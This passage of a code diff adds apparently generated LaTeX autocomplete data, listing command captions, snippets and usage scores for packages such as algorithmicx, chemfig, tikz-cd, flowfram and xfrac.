score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'pbox-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'pbox-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'pbox-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'pbox-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'pbox-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'pbox-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'pbox-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'pbox-cmd', + score: 0.028955796305270766, + }, + ], + esint: [ + { + caption: '\\int', + snippet: '\\int', + meta: 'esint-cmd', 
+ score: 0.11946660537765894, + }, + { + caption: '\\iint', + snippet: '\\iint', + meta: 'esint-cmd', + score: 0.003916494384710151, + }, + { + caption: '\\varoiint', + snippet: '\\varoiint', + meta: 'esint-cmd', + score: 0.0001069175284516453, + }, + { + caption: '\\iiint', + snippet: '\\iiint', + meta: 'esint-cmd', + score: 0.0010383179918633135, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'esint-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\oiint', + snippet: '\\oiint', + meta: 'esint-cmd', + score: 7.127835230109687e-5, + }, + ], + algorithmicx: [ + { + caption: '\\algrenewcommand', + snippet: '\\algrenewcommand', + meta: 'algorithmicx-cmd', + score: 0.0019861803661869416, + }, + { + caption: '\\Statex', + snippet: '\\Statex', + meta: 'algorithmicx-cmd', + score: 0.008622777195102994, + }, + { + caption: '\\BState{}', + snippet: '\\BState{$1}', + meta: 'algorithmicx-cmd', + score: 0.0008685861525307122, + }, + { + caption: '\\BState', + snippet: '\\BState', + meta: 'algorithmicx-cmd', + score: 0.0008685861525307122, + }, + { + caption: '\\algloopdefx{}[][]{}', + snippet: '\\algloopdefx{$1}[$2][$3]{$4}', + meta: 'algorithmicx-cmd', + score: 0.00025315185701145097, + }, + { + caption: '\\algnewcommand', + snippet: '\\algnewcommand', + meta: 'algorithmicx-cmd', + score: 0.0030209395012065327, + }, + { + caption: '\\algnewcommand{}[]{}', + snippet: '\\algnewcommand{$1}[$2]{$3}', + meta: 'algorithmicx-cmd', + score: 0.0030209395012065327, + }, + { + caption: '\\Comment{}', + snippet: '\\Comment{$1}', + meta: 'algorithmicx-cmd', + score: 0.005178604573219454, + }, + { + caption: '\\algblockdefx{}{}[]', + snippet: '\\algblockdefx{$1}{$2}[$3]', + meta: 'algorithmicx-cmd', + score: 0.00025315185701145097, + }, + { + caption: '\\algrenewtext{}{}', + snippet: '\\algrenewtext{$1}{$2}', + meta: 'algorithmicx-cmd', + score: 0.0024415580558825975, + }, + { + caption: '\\algrenewtext{}[]{}', + snippet: '\\algrenewtext{$1}[$2]{$3}', + meta: 'algorithmicx-cmd', + score: 0.0024415580558825975, + }, + { + caption: '\\algblock{}{}', + snippet: '\\algblock{$1}{$2}', + meta: 'algorithmicx-cmd', + score: 0.0007916858220314837, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'algorithmicx-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\algdef{}[]{}{}{}{}', + snippet: '\\algdef{$1}[$2]{$3}{$4}{$5}{$6}', + meta: 'algorithmicx-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algdef{}[]{}{}[]{}{}', + snippet: '\\algdef{$1}[$2]{$3}{$4}[$5]{$6}{$7}', + meta: 'algorithmicx-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algdef{}[]{}[]{}', + snippet: '\\algdef{$1}[$2]{$3}[$4]{$5}', + meta: 'algorithmicx-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algtext{}', + snippet: '\\algtext{$1}', + meta: 'algorithmicx-cmd', + score: 0.0005463612015579842, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'algorithmicx-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'algorithmicx-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'algorithmicx-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'algorithmicx-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'algorithmicx-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + 
snippet: '\\boolean{$1}', + meta: 'algorithmicx-cmd', + score: 0.0018957469739775527, + }, + ], + bibentry: [ + { + caption: '\\bibentry{}', + snippet: '\\bibentry{$1}', + meta: 'bibentry-cmd', + score: 0.002786693424998083, + }, + { + caption: '\\url{}', + snippet: '\\url{$1}', + meta: 'bibentry-cmd', + score: 0.13586474005868793, + }, + { + caption: '\\item', + snippet: '\\item ', + meta: 'bibentry-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'bibentry-cmd', + score: 3.800886892251021, + }, + { + caption: '\\nobibliography', + snippet: '\\nobibliography', + meta: 'bibentry-cmd', + score: 0.0009870472135074372, + }, + { + caption: '\\bibliography{}', + snippet: '\\bibliography{$1}', + meta: 'bibentry-cmd', + score: 0.2659628337907604, + }, + { + caption: '\\doi{}', + snippet: '\\doi{$1}', + meta: 'bibentry-cmd', + score: 0.004001210811454663, + }, + { + caption: '\\doi', + snippet: '\\doi', + meta: 'bibentry-cmd', + score: 0.004001210811454663, + }, + ], + txfonts: [ + { + caption: '\\sqrt{}', + snippet: '\\sqrt{$1}', + meta: 'txfonts-cmd', + score: 0.20240160977404634, + }, + ], + ngerman: [ + { + caption: '\\figurename', + snippet: '\\figurename', + meta: 'ngerman-cmd', + score: 0.008169568707145965, + }, + { + caption: '\\figurename{}', + snippet: '\\figurename{$1}', + meta: 'ngerman-cmd', + score: 0.008169568707145965, + }, + { + caption: '\\indexname', + snippet: '\\indexname', + meta: 'ngerman-cmd', + score: 0.0007544109314450072, + }, + { + caption: '\\glqq', + snippet: '\\glqq', + meta: 'ngerman-cmd', + score: 0.0039133256714254504, + }, + { + caption: '\\glqq{}', + snippet: '\\glqq{$1}', + meta: 'ngerman-cmd', + score: 0.0039133256714254504, + }, + { + caption: '\\today', + snippet: '\\today', + meta: 'ngerman-cmd', + score: 0.10733849317324783, + }, + { + caption: '\\bibname', + snippet: '\\bibname', + meta: 'ngerman-cmd', + score: 0.007599529252128519, + }, + { + caption: '\\bibname{}', + snippet: '\\bibname{$1}', + meta: 'ngerman-cmd', + score: 0.007599529252128519, + }, + { + caption: '\\captionsngerman{}', + snippet: '\\captionsngerman{$1}', + meta: 'ngerman-cmd', + score: 0.00010171098214158578, + }, + { + caption: '\\grqq', + snippet: '\\grqq', + meta: 'ngerman-cmd', + score: 0.006659522189248266, + }, + { + caption: '\\grqq{}', + snippet: '\\grqq{$1}', + meta: 'ngerman-cmd', + score: 0.006659522189248266, + }, + { + caption: '\\tablename', + snippet: '\\tablename', + meta: 'ngerman-cmd', + score: 0.0029238994233674776, + }, + ], + eucal: [ + { + caption: '\\mathscr{}', + snippet: '\\mathscr{$1}', + meta: 'eucal-cmd', + score: 0.025302230226027712, + }, + { + caption: '\\mathcal{}', + snippet: '\\mathcal{$1}', + meta: 'eucal-cmd', + score: 0.35084018920966636, + }, + ], + ifluatex: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ifluatex-cmd', + score: 0.008565354665444157, + }, + ], + chemfig: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'chemfig-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemfig-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chemfig-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chemfig-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'chemfig-cmd', + score: 0.015973401906548487, + }, + { + caption: 
'\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'chemfig-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'chemfig-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'chemfig-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'chemfig-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chemfig-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'chemfig-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemfig-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'chemfig-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'chemfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'chemfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'chemfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'chemfig-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'chemfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'chemfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'chemfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'chemfig-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chemfig-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chemfig-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'chemfig-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'chemfig-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'chemfig-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'chemfig-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'chemfig-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chemfig-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'chemfig-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'chemfig-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemfig-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'chemfig-cmd', + score: 0.16906710888680052, + }, + { + 
caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'chemfig-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'chemfig-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'chemfig-cmd', + score: 0.2864294797053033, + }, + ], + abstract: [ + { + caption: '\\abstractnamefont', + snippet: '\\abstractnamefont', + meta: 'abstract-cmd', + score: 6.2350576842596716e-6, + }, + ], + 'tikz-cd': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tikz-cd-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-cd-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-cd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-cd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tikz-cd-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tikz-cd-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tikz-cd-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tikz-cd-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tikz-cd-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-cd-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tikz-cd-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-cd-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tikz-cd-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-cd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-cd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-cd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tikz-cd-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-cd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-cd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-cd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tikz-cd-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-cd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-cd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tikz-cd-cmd', + score: 0.00926923425734719, + 
}, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tikz-cd-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tikz-cd-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tikz-cd-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tikz-cd-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-cd-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tikz-cd-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tikz-cd-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-cd-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tikz-cd-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tikz-cd-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tikz-cd-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tikz-cd-cmd', + score: 0.2864294797053033, + }, + ], + flowfram: [ + { + caption: '\\framebreak', + snippet: '\\framebreak', + meta: 'flowfram-cmd', + score: 0.004019097827091264, + }, + { + caption: '\\newstaticframe{}{}{}{}', + snippet: '\\newstaticframe{$1}{$2}{$3}{$4}', + meta: 'flowfram-cmd', + score: 0.0014762683341407986, + }, + { + caption: '\\newflowframe{}{}{}{}[]', + snippet: '\\newflowframe{$1}{$2}{$3}{$4}[$5]', + meta: 'flowfram-cmd', + score: 0.002952536668281597, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'flowfram-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'flowfram-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'flowfram-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'flowfram-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'flowfram-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'flowfram-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'flowfram-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'flowfram-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'flowfram-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'flowfram-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'flowfram-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'flowfram-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'flowfram-cmd', + 
score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'flowfram-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'flowfram-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'flowfram-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'flowfram-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'flowfram-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'flowfram-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'flowfram-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'flowfram-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'flowfram-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'flowfram-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'flowfram-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'flowfram-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'flowfram-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'flowfram-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'flowfram-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'flowfram-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'flowfram-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'flowfram-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'flowfram-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'flowfram-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'flowfram-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'flowfram-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'flowfram-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'flowfram-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'flowfram-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'flowfram-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'flowfram-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\afterpage{}', + snippet: 
'\\afterpage{$1}', + meta: 'flowfram-cmd', + score: 0.0018578070791608345, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'flowfram-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'flowfram-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'flowfram-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'flowfram-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'flowfram-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'flowfram-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'flowfram-cmd', + score: 0.0018957469739775527, + }, + ], + marginnote: [ + { + caption: '\\marginnote{}', + snippet: '\\marginnote{$1}', + meta: 'marginnote-cmd', + score: 0.010285502283803235, + }, + { + caption: '\\marginnote', + snippet: '\\marginnote', + meta: 'marginnote-cmd', + score: 0.010285502283803235, + }, + { + caption: '\\raggedleftmarginnote', + snippet: '\\raggedleftmarginnote', + meta: 'marginnote-cmd', + score: 0.0011268470793267921, + }, + ], + xfrac: [ + { + caption: '\\sfrac{}{}', + snippet: '\\sfrac{$1}{$2}', + meta: 'xfrac-cmd', + score: 0.0030164694688453453, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'xfrac-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'xfrac-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'xfrac-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'xfrac-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xfrac-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'xfrac-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'xfrac-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xfrac-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'xfrac-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'xfrac-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'xfrac-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xfrac-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xfrac-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'xfrac-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'xfrac-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'xfrac-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'xfrac-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', 
+ snippet: '\\includegraphics[$1]{$2}', + meta: 'xfrac-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xfrac-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'xfrac-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xfrac-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'xfrac-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'xfrac-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'xfrac-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'xfrac-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'xfrac-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'xfrac-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: 